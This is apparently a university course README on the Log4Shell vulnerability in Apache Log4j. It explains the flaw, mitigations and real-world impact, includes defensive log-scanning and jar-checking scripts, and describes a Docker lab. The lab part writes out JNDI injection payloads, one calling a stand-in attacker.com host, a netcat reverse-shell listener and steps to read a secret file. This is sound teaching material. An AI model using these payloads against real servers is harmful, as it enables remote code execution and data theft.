## https://sploitus.com/exploit?id=40E52223-C309-5E07-BDDC-2B93D5BCEEEB
# Log4Shell – Technical Overview & PoC
Made in May 2026 by Robin Köhler and Darian Rashed as part of the lecture *Secure Software Testing* at Hochschule Bonn-Rhein-Sieg.
## What is Log4Shell (CVE-2021-44228)?
### Vulnerability Profile
| Attribute | Details |
| ---------------------- | ---------------------------------------------------------------------------------------------- |
| **Name** | Log4Shell |
| **CVE-Record** | CVE-2021-44228 |
| **Vulnerability Type** | Remote Code Execution (RCE), Server-Side Request-Forgery (SSRF), Insecure Deserialization |
| **Risk Level** | Critical; it was assigned the highest possible CVSS score of 10.0 |
| **Affected Software** | The Java logging library Apache Log4j 2 (and potentially any software using it) |
| **Affected Versions** | Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) |
| **Root Cause** | A feature called Lookups insecurely processed JNDI commands directly within log messages |
| **Key Protocols** | Primarily LDAP, but also RMI and DNS can be used as interfaces for the exploit |
### Introduction
On December 9th 2021 a 0-day exploit in the Java logging library Apache Log4j was made public on Twitter alongside a PoC on GitHub. The vulnerability was originally discovered by Chen Zhaojun of the Alibaba Cloud Security Team and privately disclosed to the Apache development team, yet it was independently published before Apache could react. The now public exploit quickly gained attention because it required minimal effort, was easy to automate, led to total server compromise and resided in a library used in countless software services. Many organizations did not even know they were running it. While the vulnerability was widely discussed as *Log4Shell*, it later received the official identifier CVE-2021-44228 and the maximum severity rating of *Critical* (CVSS 10.0). The BSI assessed it at warning level *Red: the IT threat situation is extremely critical* (German: *ROT: IT-Bedrohungslage ist extrem kritisch*).
Log4Shell was less a bug than an architectural failure that had been in the code base since 2013. It abused Log4j's JNDI lookup mechanism, a feature intended to let developers populate log entries with dynamic values. However, Log4j implemented this lookup as a variable substitution that was also applied after the log message had already been constructed from user input. Log4j therefore failed to distinguish between a trusted, developer-defined pattern and untrusted, user-supplied data, so anyone who could get a string logged could trigger a lookup.
### Exploitation Steps
1. **Attacker Set-up:** The attacker sets up an HTTP server hosting the Java `.class` file they want to execute on the victim's server. They then set up an LDAP server that refers incoming requests to the `.class` file on the HTTP server.
2. **Injection of Malicious Data:** The attacker sends a payload string (such as `${jndi:ldap://attacker.com/Exploit}`) through any interface whose input gets logged, such as HTTP headers, form fields or chat messages.
3. **Processing and Lookup:** The library recognizes the lookup pattern `${jndi:` and hands it to the `StrSubstitutor` class. The vulnerable machine issues a JNDI query, connecting to the attacker's server over LDAP.
4. **Remote Object Loading:** The attacker's LDAP server responds with a class reference pointing to the malicious `.class` file on the HTTP server.
5. **Execution:** The vulnerable server downloads the referenced class and executes its code within its own process, resulting in RCE.
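Spotting the injection of step 2 in server logs is the defender's counterpart to this flow. The following Python scanner is an added example, not part of the PoC: it decodes percent-encoding, matches the `${jndi:` prefix together with the LDAP, RMI and DNS schemes named in the profile, and extracts the callback host for blocking; the log lines and addresses are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not taken from the PoC): one benign request, one payload in the
# User-Agent, one percent-encoded in the query string, one with upper-case scheme names.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/Exploit}"
10.0.0.7 - - [10/Dec/2021:01:02:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.4%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.3 - - [10/Dec/2021:01:02:06 +0000] "POST /items HTTP/1.1" 200 12 "-" "${JNDI:DNS://test.example/x}"
"""

# Lookup prefix from step 3 plus the protocols named in the profile (LDAP, RMI, DNS);
# group 2 is the callback host the victim would contact, useful for blocking and IoC matching.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:\s*//([^/\s}]+)", re.IGNORECASE)

def normalize(line: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times so percent-encoded payloads are matched in plain form."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def scan_line(line: str):
    """Return (scheme, callback_host) if the line carries a JNDI lookup string, else None."""
    m = JNDI_RE.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None

def scan_log(text: str) -> list:
    """Return [(line_no, scheme, host), ...] for every flagged line of an access log."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        hit = scan_line(line)
        if hit:
            hits.append((no, *hit))
    return hits

if __name__ == "__main__":
    for no, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {no}: JNDI lookup via {scheme} to {host}")
```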
### Mitigation
The most complete mitigation for Log4Shell is updating Log4j to version 2.17.0 or newer. Where an update is not possible, removing the `JndiLookup` class from the jar is an option as well.
Under pressure from the vulnerability going public, Apache issued patch 2.15.0 on December 10th 2021 in an attempt to disable lookups by default, accidentally enabling a new RCE mechanism that received the identifier CVE-2021-45046. Patch 2.16.0 removed the JNDI feature entirely to stop RCE but remained vulnerable to a recursive-lookup DoS (CVE-2021-45105), necessitating patch 2.17.0, which mitigated the issue entirely.
While waiting for patches, people also recommended stop-gap measures such as removing the `JndiLookup` class from Log4j entirely or disabling lookups via the `log4j2.formatMsgNoLookups=true` setting. The latter strategy turned out to be ineffective against certain attacks. Methods for checking your own infrastructure for the vulnerability were also shared widely.
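To check whether a deployment is actually exposed, its jars can be inventoried against the affected range from the table above and checked for the `JndiLookup` class that the stop-gap mitigation removes. This Python script is an added example (not part of the PoC or of Log4j); the jars it builds in a temporary directory are constructed stand-ins carrying only the Maven `pom.properties` and the class entry path, and it does not unpack jars nested inside `.war`/`.ear` archives.

```python
import re, tempfile, zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # deleting this entry is the "remove JndiLookup" mitigation
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
SECURITY_RELEASES = {"2.12.2", "2.12.3", "2.3.1"}  # back-ports excluded from the affected range

def parse_version(v: str):
    """'2.14.1' -> (2,14,1,1,0); '2.0-beta9' -> (2,0,0,0,9), so betas sort before the final."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?", v.strip())
    if not m:
        return None
    major, minor, patch, beta = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if beta else 1, int(beta or 0))

def is_affected(version: str) -> bool:
    """CVE-2021-44228 range from the profile: 2.0-beta9 through 2.15.0, minus security releases."""
    v = parse_version(version)
    if v is None or version in SECURITY_RELEASES:
        return False
    return parse_version("2.0-beta9") <= v <= parse_version("2.15.0")

def inspect_jar(path: Path) -> str:
    """Classify one jar by its declared version and whether JndiLookup.class is still inside."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
    has_class = JNDI_CLASS in names
    m = re.search(r"^version=(.+)$", props, re.MULTILINE)
    if not m:
        return "unknown-version" + ("-jndi-present" if has_class else "")
    if not is_affected(m.group(1)):
        return "not-affected"
    return "vulnerable" if has_class else "mitigated-class-removed"

def make_demo_jar(directory: Path, name: str, version: str, with_class: bool) -> Path:
    # Constructed, minimal stand-in for a log4j-core jar (not a real artifact).
    path = directory / name
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, no bytecode
    return path

def demo() -> dict:
    """Build one constructed jar per case in a temp dir and return {jar name: status}."""
    cases = [("log4j-core-2.14.1.jar", "2.14.1", True), ("log4j-core-2.14.1-stripped.jar", "2.14.1", False),
             ("log4j-core-2.12.2.jar", "2.12.2", True), ("log4j-core-2.17.0.jar", "2.17.0", False)]
    with tempfile.TemporaryDirectory() as tmp:
        return {n: inspect_jar(make_demo_jar(Path(tmp), n, v, c)) for n, v, c in cases}
```

The first case mirrors the Log4j 2.14.1 build this PoC runs; the second shows the same jar after the class was stripped.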
### Real-World Impact
Within hours of the initial GitHub PoC and Twitter disclosure, mass scanning for vulnerable servers began, since major global services and thousands of applications and frameworks were affected. Attackers weaponized Log4Shell to spread malware and to exfiltrate data and credentials. Security researchers identified several state-sponsored APT groups actively exploiting the flaw for strategic objectives.
The severity of the vulnerability led to extensive media coverage and government responses. The German Federal Office for Information Security (BSI) raised its cybersecurity warning to level "Red" (extremely critical), noting that many services could fail or that regular operations could not be maintained. In the United States, CISA added Log4Shell to its Known Exploited Vulnerabilities Catalog, requiring federal agencies to patch or remove affected software within two weeks. As a precaution, some networks and services (such as the network of the German state of Thuringia) were taken offline completely.
## Our Proof-of-Concept
### Architecture and Attack Flow
```
                         +---------------------------+
                         |       log4shell PoC       |
                         |   Docker Network Bridge   |
                         |     log4shell-network     |
                         +-------------+-------------+
                                       |
           +---------------------------+---------------------------+
           |                           |                           |
+----------+----------+     +----------+----------+     +----------+----------+
|   vulnerable-app    |     |     ldap-server     |     |     http-server     |
|     Port: 8080      |     |     Port: 1389      |     |     Port: 8000      |
|---------------------|     |---------------------|     |---------------------|
| Springboot App w/   |     | marshalsec          |     | Simple Python       |
| vulnerable Log4j    |     | LDAPRefServer       |     | http-server         |
|---------------------|     |---------------------|     |---------------------|
| Accepts and logs    |     | Returns class       |     | Serves malicious    |
| user input, does    |     | reference, points   |     | EvilMalware.class   |
| JNDI-lookups        |     | to http-server      |     | class payload       |
+----------+----------+     +----------+----------+     +----------+----------+
           |                           |                           |
           |  1. Performs JNDI-lookup  |                           |
           |     ${jndi:ldap://...}    |                           |
           |-------------------------->|                           |
           |                           |                           |
           |  2. LDAP-response returns |                           |
           |     remote class reference|                           |
           |<--------------------------|                           |
           |                                                       |
           |  3. Downloads and loads EvilMalware.class             |
           |------------------------------------------------------>|
           |
           |  4. Code execution: static{} block runs
           |
           |                            +----------------------+
           |  5. Reverse shell connects |   attacker-listener  |
           |--------------------------->|      Port: 4444      |
           |                            |----------------------|
           |  6. Interactive Shell      |   Netcat listener    |
           |--------------------------->|    nc -lvnp 4444     |
           |                            |----------------------|
           |                            | Listens for reverse  |
           |                            | shell connections    |
           |                            | from vulnerable-app  |
           v                            +----------------------+
+------------------------+
|    Attacker gained     |
|   access to victim's   |
|     infrastructure     |
+------------------------+
```
### Setup
Assuming you use an SSH key for authentication and you have [Docker installed correctly](https://docs.docker.com/engine/install/), clone the repository by running:
```
git clone git@git.fslab.de:drashe2s/log4shell.git
```
Open the folder and initialize the submodules by running:
```
cd log4shell && git submodule update --init --recursive
```
Lastly, run the following command to build the containers:
```
docker compose build
```
### Usage
After completing the setup steps, run the following command to start the containers and see their respective log messages in the terminal:
```
docker compose up
```
Point your browser to the following [URL](http://localhost:8080).
```
http://localhost:8080
```
This is the web interface of our vulnerable application running Log4J 2.14.1. It's a shopping list service. Try adding a few items to the list and have a look at the logs in your console.
Now try exploiting the application by entering a malicious item using the syntax below:
```
${jndi:ldap://ldap-server:1389/EvilMalware}
```
Have another look at the logs. Clearly something else is going on now. It looks like our attacker-listener has a new connection.
Back in the terminal, press `d` to detach from the containers' output or simply open a new terminal window in the same folder.
To access the shell of our `attacker-listener`, use:
```
docker compose attach attacker-listener
```
We now have access to the `vulnerable-app` container over the network and can read the server's secrets:
```
ls && cat secret.txt
```
When you're done, press `Ctrl+p Ctrl+q` to detach from the `attacker-listener`, then stop all the containers by running:
```
docker compose down
```
## Further Reading and Related Projects
### Resources
- [Apache Software Foundation: "Log4j 2.17.0 Release Notes"](https://logging.apache.org/log4j/2.x/release-notes.html#release-notes-2-17-0)
- [Apache Software Foundation: "Log4j Lookups Documentation"](https://logging.apache.org/log4j/2.x/manual/lookups.html)
- [Bechler, M.: "PSA: Log4Shell JNDI Injection"](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
- [Spring: "Building an Application with Spring Boot"](https://spring.io/guides/gs/spring-boot)
- [Docker Library: "Java OpenJDK 8 JDK Alpine Image Info"](https://github.com/docker-library/repo-info/blob/master/repos/java/remote/openjdk-8-jdk-alpine.md)
- [Google Security Blog: "Understanding the Impact of Apache Log4j Vulnerability"](https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html)
- [AWS Open Source Blog: "Hotpatch for Apache Log4j"](https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/)
- [Amazon Corretto: "Hotpatch for Apache Log4j2"](https://github.com/corretto/hotpatch-for-apache-log4j2)
- [Heise: "Log4j-Lücke: Erste Angriffe mit Ransomware und von staatlichen Akteuren" (German: "Log4j vulnerability: first attacks with ransomware and by state actors")](https://www.heise.de/news/Log4j-Luecke-Erste-Angriffe-mit-Ransomware-und-von-staatlicher-Akteuren-6296549.html)
- [Vehere: "Log4Shell Vulnerability: Critical Analysis and Effective Detection Strategies"](https://vehere.com/log4shell-vulnerability-critical-analysis/)
- [Cloudflare: "Inside the Log4j2 Vulnerability (CVE-2021-44228)"](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)
- [INNOQ: "Querying DNS and LDAP Using JNDI"](https://www.innoq.com/en/articles/2022/04/java-jndi/)
### Related Projects
- [Marshalsec: The LDAP server we used](https://github.com/mbechler/marshalsec/tree/master)
- [rhuss: "Log4Shell Proof of Concept"](https://github.com/rhuss/log4shell-poc)